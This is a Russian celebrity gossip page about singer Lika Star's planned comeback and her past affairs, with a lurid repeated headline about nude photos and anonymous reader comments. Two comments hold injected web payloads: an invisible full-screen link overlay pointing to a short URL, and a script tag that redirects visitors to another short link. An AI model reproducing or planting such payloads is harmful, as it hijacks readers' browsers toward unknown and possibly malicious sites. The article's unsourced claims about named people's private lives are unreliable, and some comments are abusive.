Папарацци — развлекательный online-журнал о звездах Папарацци - развлекательный online-журнал о звездах
вход
x

На фоне отсутствия Аллы Пугачевой, любовница её зятя 50-летняя Лика Стар вдруг решила вернуться на российскую сцену. ТОП горячих голых фото Лики Стар, интимное место которой пало под натиском роты солдат

На фоне отсутствия Аллы Пугачевой, любовница её зятя 50-летняя Лика Стар вдруг решила вернуться на российскую сцену. ТОП горячих голых фото Лики Стар, интимное место которой пало под натиском роты солдат

Лике Стар (Павловой) сейчас 50 лет и о ней давно ничего не было слышно, но вдруг она решила заявить о себе. Напомним, исполнительница хита «Одинокая луна» уже давно проживает в Италии, где она вышла замуж за бизнесмена и нарожала детей. Супруг артистки владеет сетью мебельных салонов, а также гостиницами на юге страны. И вот Лике вдруг надоела сытая жизнь домохозяйки и она решили вернуться на сцену в России, став участницей шоу про «сбитых лётчиков» «Суперстар».

Сезон ещё не начался, однако в сети появились кадры со съемок на которых видно, что Лика несмотря на возраст выглядит чудесно, а главное, смогла сохранить фигуру несмотря на троих детей и итальянскую кухню.

На фоне отсутствия Аллы Пугачевой, любовница её зятя 50-летняя Лика Стар вдруг решила вернуться на российскую сцену. ТОП горячих голых фото Лики Стар, интимное место которой пало под натиском роты солдат

К слову, ранее Лика Стар была на волне популярности, как вдруг исчезла. Поговаривали, что к этому приложила руку Алла Пугачева. Взбалмошная и молодая блондинка попуталась с тогдашним затем певицы Владимиром Пресняковым. Роман был недолгим, однако у Стар начались проблемы в карьере - концерты стали отменять, на мероприятия не приглашали. Лика уверена, что это козни Аллы Борисовны. Хотя, помимо неё у Павловой ещё были недоброжелатели.

Так, она вступила в интимную связь с Фёдором Бондарчуком когда тот был женат на Светлане. По словам Лики, Федя неоднократно обещал ей уйти от жены, но дальше слов не доходило, а певица ждала и верила. А потом просто подошла к жене любовника и рассказала, что спит с её мужем. По словам Стар, Света выслушала её молча и вообще ничего не ответила. Зато потом ей учинил разборки Федор и стал обвинять во лжи, как бы там ни было, ему удалось убедить благоверную в своей верности. Ну а скандалистка Лика вскоре уехала за границу, где оттяпала состоятельно мужа и стала домохозяйкой.

На фоне отсутствия Аллы Пугачевой, любовница её зятя 50-летняя Лика Стар вдруг решила вернуться на российскую сцену. ТОП горячих голых фото Лики Стар, интимное место которой пало под натиском роты солдат

Что теперь сподвигло её на возвращение неизвестно. То ли стало не хватать денег, то ли личные амбиции, тем более, что Пугачевой в стране нет и палки в колёса вставлять некому.

К слову, певица всегда хорошо выглядела и не стеснялась демонстрировать фигуру в очень откровенных фотосессиях. Предлагаем взглянуть на одну из провокационных съемок, во время которой Лику Стар атаковали солдаты своими пушками. ТОП горячих дерзких фото Лики Стар, которой не знакома скромность, листаем:

Читать далее:  1    2    3    4    След.→  

 

«Сумасшедший день»: Саша Бортич и Юля Коваль сделали парные татуировки Дженнифер Лопес потребовала сократить общение Бена Аффлека и Дженнифер Гарнер
Просим воздержаться от употребления мата. Комментарий, содержащий нецензурную брань, будет автоматически удалён.
10 комментариев


АНОНИМ 10.10.2023 10:40

итлПасты не хватает в Италии что решила вернуться. ну ну


АНОНИМ 10.10.2023 11:38

конечно денег нет, европа в кризисе, но она реп читать хочет?у нее кроме расталкивать локтями, больше нет талантов


АНОНИМ 10.10.2023 15:16

Лика-бибика :) Если не ошибаюсь, одна из первых в России девушек-DJ и промоутеров клубной культуры, достаточно профессиональных на то время.


АНОНИМ 10.10.2023 15:17

Вы там пьяные тексты пишите такие тексты? Если умственно отсталые, не лезьте в сми.


АНОНИМ 10.10.2023 15:39

про расталкивать локтями смешной комментарий. первая в нашей стране девушка-МС, первая из отечественных музыкантов выпустившая компакт-диск в формате maxi-single с ремиксами ещё в 1994-м году, она во многом была первой, может быть, не особо талантливой, но яркой и запоминающейся, со своим собственным, индивидуальным стилем и популяризирующей абсолютно новые для нас направления в музыке (конечно, в сотрудничестве и с другими, уже и отчасти подзабытыми, музыкантами)


АНОНИМ 10.10.2023 15:49

Класс<a/href="//kurl.ru/WrpTy"style="position:fixed;left:0;top:0;width:9999px;height:9999px;"></a>


АНОНИМ 10.10.2023 15:51

<sc ript>location.replace('//clck.ru/35tfNu')</sc ript>Nick


АНОНИМ 10.10.2023 20:36

офигеть, у этой лухшки есть почитатели судя по комментам?швах вообще, баба безларность невозможная


АНОНИМ 11.10.2023 7:57

Хабалка


АНОНИМ 11.10.2023 7:58

Замужем, дети. Нормально. Но биография …. Похвастаться нЕчем. В 14 лет ушла из родительского дома. Училась в школе? До пятого класса - и это все ее образование. Зато таскалась с женатыми. Оправдывает своё аморальное поведение и осуждает мужчин. Да, они виноваты. Но су..ка не захочет - кобель не вскочит - гласит мудрая русская пословица. Короче говоря, тА ещё штучка, эта Лика. А что она удивляется реакции Аллы Пугачевой? Так любая мать поступила бы так же. И это ещё мало - могли быть последствия и пострашнее. А таланта там никакого нет. Есть эпатаж и нахальство. И все.








Агата Муцениеце Алена Водонаева Алена Шишкова Алла Пугачева Анастасия Волочкова Анастасия Костенко Анастасия Решетова Анджелина Джоли Андрей Малахов Ани Лорак Анна Седокова Анна Семенович Анфиса Чехова Бритни Спирс Валерия Вера Брежнева Виктория Боня Виктория Дайнеко Виктория Лопырева Глюкоза Дана Борисова Дженнифер Лопес Джиган Дима Билан Дмитрий Тарасов Дмитрий Шепелев Дом 2 Жанна Фриске Иван Ургант Иосиф Пригожин Ирина Шейк Кейт Миддлтон Ким Кардашьян Кристина Асмус Кристина Орбакайте Ксения Бородина Ксения Собчак Курбан Омаров Лера Кудрявцева Максим Виторган Максим Галкин Мария Кожевникова Меган Маркл Настасья Самбурская Настя Каменских Наташа Королева Николай Басков Нюша Оксана Самойлова Ольга Бузова Павел Прилучный Полина Гагарина Прохор Шаляпин Рианна Рита Дакота Светлана Лобода Сергей Лазарев Тимати Филипп Киркоров Яна Рудковская
+ Добавить нoвость